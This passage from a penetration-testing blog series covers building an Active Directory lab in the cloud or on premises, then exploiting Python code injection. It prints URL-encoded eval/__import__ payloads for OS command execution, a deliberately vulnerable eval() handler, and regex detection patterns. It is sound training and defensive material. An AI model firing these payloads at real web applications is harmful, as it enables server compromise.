<br /></div>
<div>
3) Click <b>Properties</b></div>
</div>
<div>
<br /></div>
<div>
4) On the left, click <b>Remote Settings</b>, and enter the domain administrator credentials</div>
<div>
<b><br /></b></div>
<div>
5) In the <b>Remote Desktop</b> section of the window, click <b>Select Users...</b></div>
<div>
<b><br /></b></div>
<div>
6) Click <b>Add...</b></div>
<div>
<b><br /></b></div>
<div>
7) Type <b>Domain users </b> and click <b>Check Names</b></div>
<div>
<b><br /></b></div>
<div>
8) Click <b>OK, OK, OK</b></div>
<div>
<b><br /></b></div>
<div>
You should now be able to RDP to this host with any of your domain users (User1, User2, Admin1)</div>
<div>
<b><br /></b></div>
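<div>
One script that walks the last three sections, as an added example that is not part of the original post: it sets the DC as this host's DNS server, turns the three troubleshooting questions (ping, name resolution, reaching \\DC) into checks that run before the join, performs the rename and domain join with admin1's credentials, and, after the reboot, grants Domain Users RDP access. The DC address 10.0.0.10 is a placeholder; the adapter alias <b>Ethernet</b>, the DC hostname AWS-DC01 and the NetBIOS domain AWS are assumptions.</div>

```powershell
# Added example, not from the original post: points the member server's DNS
# at the DC, runs the post's troubleshooting checks (ping, name resolution,
# reachability of \\DC over SMB), then joins the domain and, after the reboot,
# grants Domain Users RDP access. Run in an elevated PowerShell session on the
# host being joined. Assumptions: DC private IP 10.0.0.10 is a placeholder,
# adapter alias "Ethernet", DC hostname AWS-DC01, domain aws.local, and the
# join account AWS\admin1 from the post.

$DcIp   = "10.0.0.10"      # placeholder: your DC's private (static) IP
$Domain = "aws.local"
$DcHost = "AWS-DC01"
$Alias  = "Ethernet"

function Set-LabDns {
    # The one thing you NEED to do: make the DC this host's primary DNS server
    Set-DnsClientServerAddress -InterfaceAlias $Alias -ServerAddresses $DcIp
    Clear-DnsClientCache
}

function Test-LabDomainPrereqs {
    $r = [ordered]@{}
    # 1) Can you ping the DC? (the security group must allow ICMP, e.g. "All traffic")
    $r["ping"]   = Test-Connection -ComputerName $DcIp -Count 2 -Quiet
    # 2) Can you resolve the DC's hostname, and the SRV record clients use to locate a DC?
    $r["dnsA"]   = [bool](Resolve-DnsName "$DcHost.$Domain" -Type A -ErrorAction SilentlyContinue)
    $r["dnsSRV"] = [bool](Resolve-DnsName "_ldap._tcp.dc._msdcs.$Domain" -Type SRV -ErrorAction SilentlyContinue)
    # 3) Can you reach \\DC? SMB 445 plus the LDAP and Kerberos ports a join needs
    foreach ($port in 445, 389, 88) {
        $r["tcp$port"] = (Test-NetConnection -ComputerName $DcIp -Port $port -WarningAction SilentlyContinue).TcpTestSucceeded
    }
    return $r
}

function Join-LabDomain {
    # Rename and join in one step; prompts for admin1's domain password and reboots
    $cred = Get-Credential -UserName "AWS\admin1" -Message "Domain admin credentials"
    Add-Computer -DomainName $Domain -NewName "Workstation01" -Credential $cred -Restart -Force
}

function Grant-LabRdpAccess {
    # Run after the reboot, logged in as a domain admin. On Server 2012, which lacks
    # the LocalAccounts module, use: net localgroup "Remote Desktop Users" "AWS\Domain Users" /add
    Add-LocalGroupMember -Group "Remote Desktop Users" -Member "AWS\Domain Users"
}

Set-LabDns
$checks = Test-LabDomainPrereqs
$checks
if ($checks.Values -contains $false) {
    Write-Warning "A check failed. Re-check the security group (All traffic, correct source CIDR), the DC's static subnet mask, and this host's DNS setting."
} else {
    Join-LabDomain
}
```

<div>
A failed <b>ping</b> with passing TCP checks usually means the security group allows TCP but not ICMP (the "All TCP instead of All traffic" mistake); failing <b>dnsA</b>/<b>dnsSRV</b> with a passing ping points at the DNS setting on this host or a wrong domain name; everything failing points at the subnet mask or source CIDR. After the reboot, run <b>Grant-LabRdpAccess</b> once, and User1, User2 and Admin1 can all RDP in.</div>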
<div>
<h3>
Wrap-Up</h3>
You did it! You should have 1 DC, and 1-3 additional hosts set up in AWS. You are now ready to try all sorts of stuff, like Empire, Metasploit, Mimikatz, Kerberoasting, and more.<br />
<br />
Feedback, suggestions, corrections, and questions are welcome!</div>
</div>
<div>Seth Art (<a href="http://www.blogger.com/profile/05253599496757968918">Blogger profile</a>)</div>
<h2>
Pentest Home Lab - 0x0 - Building a virtual corporate domain</h2>
<div>Published 2017-05-04, last updated 2017-12-02</div>
Whether you are a professional penetration tester or want to become one, having a lab environment that includes a full Active Directory domain is really helpful. There have been many times where, in order to learn a new skill, technique, exploit, or tool, I've had to first set it up in an AD lab environment.<br />
<br />
Reading about attacks and understanding them at a high level is one thing, but I often have a hard time really wrapping my head around something until I've done it myself. Take Kerberoasting for example: Between <a href="https://www.youtube.com/watch?v=HHJWfG9b0-E">Tim's talk a few years back</a>, <a href="https://room362.com/post/2016/kerberoast-pt1/">Rob's posts</a>, and <a href="http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/">Will's post</a>, I knew what was happening at a high level, but I didn't want to try out an attack I'd never done before in the middle of an engagement. But before I could try it out for myself, I had to first figure out how to create an SPN. So off to Google I went, and then off to the lab:<br />
<br />
<ul>
<li>I set up MSSQL on a domain connected server in my home lab</li>
<li>I created a new user in my AD</li>
<li>I created a SPN using setspn, pairing the new user to the MSSQL instance</li>
<li>I used Empire to grab the SPN hash as an unprivileged domain user (So cool!!)</li>
<li>I sent the SPN hash to the password cracker and got the weak password </li>
</ul>
<div>
THAT was a fun night!</div>
<div>
<br /></div>
<div>
So back to the goal of this blog series. I'll share what I've learned while building my own lab(s), I'll share some of the things I've done in my lab to try and improve my skills, and for every attack I cover, I'll also cover how to set up your lab environment.</div>
<br />
<h2>
The series so far:</h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a> (This post)</li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a></li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a></li>
<li><a href="https://sethsec.blogspot.com/2017/08/pentest-home-lab-0x3-kerberoasting.html">Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them</a></li>
</ul>
</div>
<br />
<h2>
Selecting Your Virtualization Stack</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-qetV_nPaRLk/WQqinSA0jzI/AAAAAAAABWQ/mxeyrz6BFXkiwI1KAIVryKh88_Jrk7FjgCEw/s1600/main.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="https://2.bp.blogspot.com/-qetV_nPaRLk/WQqinSA0jzI/AAAAAAAABWQ/mxeyrz6BFXkiwI1KAIVryKh88_Jrk7FjgCEw/s640/main.png" width="640" /></a></div>
<span style="color: red;"><br /></span>
<span style="color: red;"><br /></span>
<span style="color: red;">QUESTION: Should I build this in the cloud or on premises?</span><br />
<br />
Before we can get to any of the hacking, we need to talk about where you are going to install your virtual environment. In fact, your home lab doesn't even need to be located within your home. I'll give an overview of each option, but the decision will likely be influenced by what hardware you have lying around, how much you want to spend up front, and how much you will be using your lab. In the end, you might even want to try more than one option, as they all have distinct benefits.<br />
<br />
<h3>
Cloud Based</h3>
<div>
Often, building a home lab using dedicated hardware is cost prohibitive. In addition to hardware costs, if you add Windows licensing costs, a traditional home lab can get really expensive. The good news is these days you don't need to buy any hardware or software (OS). You can build your lab using AWS, Azure, Google, etc. In addition to not having to purchase hardware, another major advantage of building your lab in the cloud is that the Windows licensing costs are built into your hourly rate (at least for AWS -- I'm not as familiar with Azure or Google). </div>
<div>
<br /></div>
<div>
<u>Pros</u> </div>
<div>
<br />
<ul>
<li><b>Hardware</b></li>
<ul>
<li>No hardware purchases</li>
</ul>
<li><b>OS Licensing</b></li>
<ul>
<li>No Windows OS software purchases</li>
<li>No expiring Windows eval licenses</li>
</ul>
<li><b>Hourly Pricing</b></li>
<ul>
<li>You only pay for the time you use the lab machines</li>
</ul>
<li><b>Education</b></li>
<ul>
<li>You will learn a lot about the cloud stack you are building on</li>
</ul>
</ul>
<br />
<u>Cons</u><br />
<ul>
<li><b style="font-weight: bold;">Cost</b></li>
<ul>
<li>Leaving your instances running gets pretty expensive. Four Windows servers (t2.micro) running 24/7 will put you at around 45 bucks a month</li>
</ul>
<li><b>Keeping track of instances</b></li>
<ul>
<li>If you don't want them running all the time, you will have to remember to shut down instances when not in use or configure CloudWatch to do that for you</li>
</ul>
<li><b>You can't pause instances</b></li>
<ul>
<li>In AWS at least, you can't pause VMs like you can with virtualization software. This is pretty annoying if you are used to pausing your VMs at the end of each session and picking up where you left off</li>
</ul>
<li><b>Limited Windows OS Support</b></li>
<ul>
<li>No Windows 7/8/10 images (might be AWS specific)</li>
</ul>
<li><b>Some testing activities need to be approved</b></li>
<ul>
<li>You'll have to notify the cloud provider if you want to attack your instances from outside your virtual private cloud (VPC)</li>
</ul>
</ul>
<h4>
AWS Math</h4>
<div>
AWS can be reasonable for home use, or it can get very expensive, depending on how you use it. The key here is to think about how much you will be using your lab. If you think you will play in your lab around 3 hours a night about 10 nights a month, AWS makes a lot of sense. If you are going to be running your hosts permanently, it will probably be more cost effective to run your lab on premises.</div>
<div>
<br /></div>
<div>
Here are some cost estimations using <a href="https://calculator.s3.amazonaws.com/index.html">AWS's cost estimator</a>:</div>
<div>
<br />
<b>Update (5/8/2017)</b>: I previously did not include EBS volume costs in the tables below. I've updated the tables to include EBS volume costs (30GB for each windows volume, 20GB for Kali). You are charged for provisioned EBS volumes whether the instance is running or stopped. <br />
<br /></div>
2 Windows instances, 1 Kali instance<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ieUfQhzfaOA/WRB2bZjbEII/AAAAAAAABXE/olQUAxFJZCwI26dVzY_7sV9WSr8PbWk1wCLcB/s1600/fixed-costs2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://4.bp.blogspot.com/-ieUfQhzfaOA/WRB2bZjbEII/AAAAAAAABXE/olQUAxFJZCwI26dVzY_7sV9WSr8PbWk1wCLcB/s640/fixed-costs2.png" width="640" /></a></div>
<br /></div>
Annual cost if you use your lab 30 hours a month on average: $112/year.<br />
<br />
4 Windows instances, 1 Kali instance<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Px_T0RBRe9k/WRB2bdcjrnI/AAAAAAAABXA/_nNV3dJAX7E0p1wS_zPj6N99D7bRS64xwCEw/s1600/fixed-costs4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://1.bp.blogspot.com/-Px_T0RBRe9k/WRB2bdcjrnI/AAAAAAAABXA/_nNV3dJAX7E0p1wS_zPj6N99D7bRS64xwCEw/s640/fixed-costs4.png" width="640" /></a></div>
<br />
<div>
<div>
Annual cost if you use your lab 30 hours a month on average: $196/year<br />
<br /></div>
These are just estimations. You can save money by choosing a smaller volume size at instance creation, keeping your Kali instance local, and by tearing down and rebuilding some or part of the environment if you feel like you don't need it for a few months. <br />
<br />
Also, as you can see, the difference in EC2 costs is pretty extreme if you leave your instances running all the time. Remember to turn off those instances when not in use!<br />
<br />
One caveat with building your lab entirely in the cloud, at least with AWS, is that AWS does not offer an AMI for Windows 7/8/10. While it appears possible to use your own Windows 7/8/10 image, now you are back to either using eval licenses or paying for them. While doing research for this blog series, I came across something called AWS WorkSpaces, and even that does not use 7/8/10. It simulates a desktop environment using Microsoft's Desktop Experience via Windows Server 2012. </div>
<div>
<br /></div>
<div>
After playing around with Amazon Workspaces, I realized it is not the best option for a pentest lab due to monthly costs ($7 per month per workstation), but I did learn you don't really NEED Windows 7/8/10 in your pentest home lab to do most of what we will want to do, which was a good lesson.</div>
<div>
<br />
In an upcoming post, I will write in detail about <a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html">Building your AD lab on AWS</a>.<br />
<br /></div>
<h3>
On Premises</h3>
<div>
If you are going to build the lab on your own hardware, the next decision you need to make is: Do I use dedicated hardware and a hypervisor, or do I run software that sits on top of my host OS like VMware Workstation Pro, Workstation Player, VMware Fusion (Mac), or VirtualBox? <br />
<br />
<h4>
Using your Desktop/Laptop</h4>
</div>
<div>
If you have a desktop/laptop that has plenty of resources to spare, there is no reason you can't set this entire environment up on your OS of choice using either VMware or VirtualBox. On my laptop, I use VMware Workstation and have a test domain with 1 domain controller, 1 additional Windows server, and 1 Windows 7 host. With a 1TB HDD and 16GB of RAM, I can run all three if I need to, and Kali at the same time. If you can swing 32GB and a bigger SSD, that would give you even more flexibility. As I mention in the cons below, you might be limited. My current laptop can't take more than 16GB.</div>
<div>
<br /></div>
<u>Pros</u><br />
<br />
<ul>
<li><b>Mobility</b></li>
<ul>
<li>Take your lab with you wherever you go (if you have a laptop)</li>
</ul>
<li><b>Easy entry</b></li>
<ul>
<li>You probably already have a Desktop/Laptop that you can use</li>
</ul>
<li><b>Free Options</b></li>
<ul>
<li>VirtualBox and VMware Workstation Player are free</li>
</ul>
</ul>
<br />
<u>Cons</u><br />
<br />
<ul>
<li><b>Cost</b></li>
<ul>
<li>VMware Workstation Pro (windows) and VMware Fusion (mac) are not free</li>
</ul>
<li><b>Hardware Limitations </b></li>
<ul>
<li>Your current desktop/laptop might be limited in how much memory you can add to it</li>
</ul>
<li><b>Shared Resourcing</b></li>
<ul>
<li>You are competing for shared resources on your host OS. This might not be acceptable</li>
<li>Every time you need to reboot your host OS, you have to stop/pause all of your VMs</li>
</ul>
</ul>
<br />
<div>
<h3>
Using a Hypervisor</h3>
<div>
Most penetration testers that I know still keep it traditional and use dedicated hardware combined with a hypervisor for their home lab. There are plenty of great articles that talk about hardware requirements and options. I have friends who prefer to go the route of buying old enterprise hardware on eBay, but I have always just used consumer hardware. Either way, between the RAM and fast disks, it can get expensive. On my server, I have an AMD 8 core chip circa 2015, and I just upgraded from 16 to 32GB of RAM, and from a 512GB SSD to a 1TB SSD. If you can afford it, avoid the mistake I made and just go right to 32GB of RAM and a 1TB SSD. That will give you more than enough room to grow your lab, make templates, take lots of snapshots, etc.</div>
<div>
<br /></div>
<div>
<u>Pros</u><br />
<br />
<ul>
<li><b>Flexibility</b></li>
<ul>
<li>With dedicated hardware, you can isolate the lab on its own network, VLAN, etc. </li>
</ul>
<li><b>Software cost</b></li>
<ul>
<li>There are plenty of free options when it comes to Hypervisors</li>
</ul>
<li><b>Options</b></li>
<ul>
<li>You can take advantage of things like KVM, containers, and thin provisioning </li>
</ul>
<li><b>Portability</b></li>
<ul>
<li>If you use something small like an Intel NUC, your lab can be portable</li>
</ul>
</ul>
<br />
<br />
<u>Cons</u><br />
<br />
<ul>
<li><b>Energy Inefficient</b></li>
<ul>
<li>The last thing anyone who reads this post needs is yet another computer running 24/7 ;)</li>
</ul>
<li><b>Cost</b></li>
<ul>
<li>Unless you have something laying around already, you'll have to buy new hardware</li>
</ul>
<li><b>Vendor Specific Knowledge</b></li>
<ul>
<li>Do you have the time and desire to learn all of the hypervisor specific troubleshooting commands when something breaks? </li>
</ul>
</ul>
<br />
<h4>
Great Home Lab Resources</h4>
</div>
<div>
<a href="https://www.darkoperator.com/blog/2017/1/28/home-lab-design">Home Lab Design</a> by Carlos Perez<br />
<a href="https://www.darkoperator.com/blog/2014/1/10/my-new-home-lab-setup">My new home lab setup</a> by Carlos Perez<br />
<a href="https://adsecurity.org/?p=2653">Building an Effective Active Directory Lab Environment for Testing</a> by Sean Metcalf<br />
<a href="https://room362.com/post/2015/intel-nuc-super-server/">Intel NUC Super Server</a> by Mubix<br />
<br />
Over the years I've played with a few of the popular Hypervisors, and here are my thoughts:</div>
<br />
<b>VMware ESXi</b> - My first lab was ESXi. If you've never used it, I recommend using this as your hypervisor if for no other reason than it is ubiquitous in the enterprise. You will find ESX on every internal pentest, and having experience with it from your home lab will help you one day.<br />
<br />
<b>Citrix Xen</b> - Eventually my ESX hard drive failed. After reading <a href="https://room362.com/post/2015/intel-nuc-super-server/">this post</a> by Mubix, when I rebuilt, I tried Citrix's XenServer. I liked Xen, but I quickly ran out of space on my 512GB SSD, and when I added a second drive it started to freak out. The number of custom Xen commands I had to learn was getting out of control, and I didn't feel like the experience was going to help me all that much, so I pulled the plug and looked for something new.<br />
<br />
<b>Proxmox VE</b> - For my third iteration, I'm using Proxmox VE, after my friend @mikehacksthings gave a presentation on it at a recent @IthacaSec meeting. I really like it! Thin provisioning means it uses a lot less resources, and it seems lightning fast compared to ESXi and Xen. It definitely has my stamp of approval so far. <br />
<br />
In an upcoming post, I'm going to write in detail about building your AD lab on premises using Proxmox.<br />
<div>
<br /></div>
<h3>
Getting Windows Server Software</h3>
<div>
If you are going to build your lab in the cloud, you can just relax and skip this section. If you are going to build on premises, you will need to get your hands on the following software:</div>
<div>
<ul>
<li>Required - Windows Server (2012 or 2016)</li>
<li>Optional - Windows 7 (or 8 or 10) </li>
</ul>
</div>
<div>
In terms of getting the software, there are a few options: </div>
<div>
<ol>
<li>Download evaluation versions, which are good for 180 days.</li>
<li>See if your workplace has a key/iso that can be used in a lab environment.</li>
<li>Go with a cloud solution like AWS or Azure where the licensing costs are built into your hourly rate.</li>
<li>I think if you are a student you can get the OS's for free.</li>
</ol>
</div>
For more detail on these options, check out Sean Metcalf's blog post: <a href="https://adsecurity.org/?p=2653">Building an Effective Active Directory Lab Environment for Testing</a>. You will also notice that Sean gives some really useful breakdowns of what he feels you need in an AD lab. I'm going to keep this series more basic than that, but I encourage you to read his post. <br />
<br />
<h3>
Let's create a Domain</h3>
<div>
Once you have selected your virtualization stack, it is time to configure it. The following two posts take you through setting up two AD Lab environments. One in the cloud using AWS, and another on premises using Proxmox VE. <br />
<br />
<a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a><br />
Pentest Home Lab - 0x2 - Building Your AD Lab on Premises (Coming Soon)<br />
<br />
<h3>
Wrap-Up</h3>
Feedback, suggestions, corrections, and questions are welcome!</div>
</div>
<div>Seth Art (<a href="http://www.blogger.com/profile/05253599496757968918">Blogger profile</a>)</div>
<h2>
Exploiting Python Code Injection in Web Applications</h2>
<div>Published 2016-11-09, last updated 2016-11-20</div>
A web application vulnerable to Python code injection allows you to send Python code through the application to the Python interpreter on the target server. If you can execute Python, you can likely call operating system commands. If you can run operating system commands, you can read/write files that you have access to, and potentially even launch a remote interactive shell (e.g., nc, Metasploit, Empire). <br />
<br />
The thing is, when I needed to exploit this on an external penetration test recently, I had a hard time finding information online about how to move from proof of concept (POC) to useful web application exploitation. Together with my colleague Charlie Worrell (<span style="font-family: inherit;"><a class="url" href="https://twitter.com/decidedlygray" style="box-sizing: border-box; color: #4078c0; text-decoration: none; white-space: nowrap;">@decidedlygray</a>),</span> we were able to turn the Burp POC (sleep for 20 seconds) into a non-interactive shell, which is what this post covers. <br />
<br />
Python code injection is a subset of server-side code injection, as this vulnerability can occur in many other languages (e.g., Perl and Ruby). In fact, for those of you who are CWE fans like I am, these two CWEs are right on point:<br />
<br />
<a href="https://cwe.mitre.org/data/definitions/94.html">CWE-94: Improper Control of Generation of Code ('Code Injection')</a><br />
<a href="https://cwe.mitre.org/data/definitions/95.html">CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')</a><br />
<br />
<h2>
TL;DR</h2>
<div>
If you (or Burp or another tool) finds a python injection with a payload like this:<br />
<span style="color: #783f04;"><br /></span>
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))</b></span></div>
<div>
<br /></div>
You can use the following payload to go from a time based POC to OS command injection:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">eval(compile("""for x in range(1):\\n import os\\n os.popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
And as it turns out, you don't even need the for loop. You can use the global __import__ function:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">eval(compile("""__import__('os').popen(r'</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read()""",'','single'))</span></b></span><br />
<br />
Better yet, now that we have import and popen as one expression, in most cases, you don't even need to use compile at all:<br />
<br />
<b><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: #b45f06;">__import__('os').popen('</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">').read(</span></span><span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;">)</span></b><br />
<br />
To pass these to the web application, you will have to URL encode some characters. The examples from above are each encoded below to illustrate what they might look like in action:<br />
<br />
<ul>
<li><span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29</b></span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29</span></b></span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29</span></b></span></li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b><span style="color: #b45f06;">param=__import__%28%27os%27%29.popen%28%27</span><span style="color: red;">COMMAND</span><span style="color: #b45f06;">%27%29.read%28%29</span></b></span></li>
</ul>
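The encoded forms above are exactly what a web server's access log records, so a defender can triage for them. This is an added example, not code from the original post: it URL-decodes each query string the way the framework would and flags parameter values containing the constructs every payload variant in this post relies on. The log lines are constructed; POST bodies and cookie values (the author's case) are not in an access log and need the application's own logging.

```python
"""Added example (not from the original post): triage access-log lines for
the Python code injection payload shapes shown above. SAMPLE_LOG is
constructed; nothing here comes from a real server."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructs that appear in every payload variant in this post
# (eval/compile, __import__, os.popen, subprocess.*, time.sleep probes).
SUSPICIOUS = re.compile(
    r"__import__\s*\(|\bcompile\s*\(|\.popen\s*\(|\bsubprocess\b|"
    r"\bcheck_output\s*\(|\btime\.sleep\s*\(|\bexec\s*\(|\beval\s*\("
)

# Common-log-format request line: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Constructed sample: line 2 is the Burp-style sleep probe, line 3 the
# one-expression __import__ payload; the rest are benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Oct/2016:14:03:11 -0400] "GET /?param=1%2B1 HTTP/1.1" 200 17
10.0.0.5 - - [27/Oct/2016:14:03:19 -0400] "GET /?param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29 HTTP/1.1" 200 17
10.0.0.5 - - [27/Oct/2016:14:03:40 -0400] "GET /?param=__import__%28%27os%27%29.popen%28%27id%27%29.read%28%29 HTTP/1.1" 200 61
10.0.0.7 - - [27/Oct/2016:14:04:02 -0400] "GET /?param=%5B1%2C%202%2C%203%5D HTTP/1.1" 200 9
10.0.0.5 - - [27/Oct/2016:14:04:30 -0400] "POST /search HTTP/1.1" 200 120
"""


def decoded_params(target: str) -> dict:
    """Query parameters of a request target, URL-decoded once, which is
    what the web framework hands to the handler (and to eval())."""
    query = urlsplit(target).query
    return dict(parse_qsl(query, keep_blank_values=True))


def find_injection_attempts(log_text: str) -> list:
    """Return (line_number, parameter_name, matched_construct) for every
    parameter value that looks like a Python code injection attempt."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # not a request line we can parse
        for name, value in decoded_params(match.group("target")).items():
            found = SUSPICIOUS.search(value)
            if found:
                hits.append((lineno, name, found.group(0)))
    return hits


if __name__ == "__main__":
    for lineno, name, construct in find_injection_attempts(SAMPLE_LOG):
        print(f"line {lineno}: parameter {name!r} contains {construct!r}")
```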
The rest of the post will dig into the details, share an intentionally vulnerable web app, and at the end of the post I'll demo a tool that Charlie and I wrote that really speeds up exploitation of this vulnerability -- kind of like what sqlmap does for SQLi, but in the infancy stage.<br />
<br />
<h2>
Setting up a Vulnerable Server</h2>
<div>
I created an intentionally vulnerable application for the purpose of this post, so if you want to exploit this in your lab, you can grab it <a href="https://github.com/sethsec/PyCodeInjection">here</a>. To get it to work, you have to install web.py via pip or easy_install, but that is it. It can run as a stand alone server, or it can be loaded up into Apache with mod_wsgi.<br />
<br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>git clone https://github.com/sethsec/PyCodeInjection.git</b></span><br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>cd VulnApp</b></span><br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>./install_requirements.sh</b></span><br />
<span style="color: #b45f06; font-family: "courier new" , "courier" , monospace;"><b>python PyCodeInjectionApp.py</b></span><br />
<br /></div>
<h2>
The Vulnerability</h2>
<div>
Although you would be hard pressed to find an article online that talks about python eval() without warning that it is unsafe, eval() is the most likely culprit here. When you have the following two conditions, the vulnerability exists: </div>
<div>
<ol>
<li>Application accepts user input (e.g., GET/POST param, cookie value)</li>
<li>Application passes that user controlled input to eval in an unsafe way (without sanitization or other protection mechanisms). </li>
</ol>
</div>
<div>
Here is a simplified version of what the vulnerable code could look like:<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/---jisjpw2xE/WCEFleqsRuI/AAAAAAAABLQ/t4TYMojXhNkg8vUSvsTva-gXNx-samnBgCLcB/s1600/pyinject-vulncode1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://4.bp.blogspot.com/---jisjpw2xE/WCEFleqsRuI/AAAAAAAABLQ/t4TYMojXhNkg8vUSvsTva-gXNx-samnBgCLcB/s640/pyinject-vulncode1.png" width="640" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
That said, eval() is only one of the potential culprits here. A developer can also introduce this <a href="https://blog.nelhage.com/2011/03/exploiting-pickle/">vulnerability by unpickling</a> serialized data passed by the user.<br />
<br />
Python's exec() is another way you can make your app vulnerable, but as far as I can tell, a developer would have to try even harder to find a reason to exec() web based user input. That said, I'm sure it happens.<br />
<br /></div>
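To make the two conditions concrete, here is an added example (not the PyCodeInjection app's own code; the handler names and the calculator feature they implement are hypothetical): a handler that passes the request parameter straight to eval() beside two hardened forms that let the client send only literals, or only arithmetic, instead of arbitrary Python.

```python
"""Added example (not from the PyCodeInjection app): a handler that passes
user input straight to eval() beside two hardened forms. Handler names and
the calculator feature they implement are hypothetical."""
import ast


def vulnerable_handler(param: str):
    """Conditions 1 and 2 from the text in one line: a request parameter is
    evaluated as Python. Any expression the client sends, including
    __import__('os').popen(...).read(), runs with the web server's
    privileges. Kept here only to show the defect."""
    return eval(param)  # intentionally unsafe


def hardened_handler(param: str):
    """Same feature (the client sends a literal, e.g. a list of numbers)
    without handing the client an interpreter. ast.literal_eval accepts
    only literals: str, bytes, numbers, tuples, lists, dicts, sets, bools
    and None. Names, calls and attribute access raise ValueError, so
    __import__('os') or eval(compile(...)) is never executed."""
    try:
        return ast.literal_eval(param)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        # One generic error for every rejected input; never echo the
        # attacker-controlled string back into the page.
        raise ValueError("input is not a literal") from None


# If the feature needs arithmetic rather than bare literals, allowlist the
# AST node types instead of searching the input string for bad words.
ALLOWED_NODES = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
                 ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub, ast.UAdd)


def safe_arith(param: str):
    """Parse first, then evaluate only if every node is on the allowlist.
    Pow is left out on purpose (10**10**10 is a denial of service) and
    string constants are rejected so 'a' * 10**9 cannot exhaust memory.
    A ZeroDivisionError from the evaluation is left to the caller."""
    try:
        tree = ast.parse(param, mode="eval")
    except SyntaxError:
        raise ValueError("not an arithmetic expression") from None
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError("not an arithmetic expression")
        if isinstance(node, ast.Constant) and not isinstance(node.value, (int, float)):
            raise ValueError("only numeric constants are allowed")
    # The tree has been vetted; the empty builtins dict is belt and braces,
    # not the control.
    return eval(compile(tree, "<calc>", "eval"), {"__builtins__": {}}, {})


def rejects(handler, param: str) -> bool:
    """True if the handler refuses the input with ValueError."""
    try:
        handler(param)
    except ValueError:
        return True
    return False
```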
<h2>
Automated Discovery </h2>
<div>
Having a scanner find something I haven't seen before, and then doing the research to move from vanilla POC to something report worthy has been one of the pillars of my offensive security education (along with learning how to find things that scanners can not find). This vulnerability is no different. If you find this in the wild, you will most likely find it with an automated tool, like Burp Suite Pro. In fact, the check Burp uses is something they developed internally, so I'm not sure you would even find this vulnerability without Burp Suite Pro at this point. </div>
<div>
<br /></div>
<div>
Once you have the vulnerable demo app up and running, you should be able to find the vulnerability with a Burp Suite Pro scan: </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
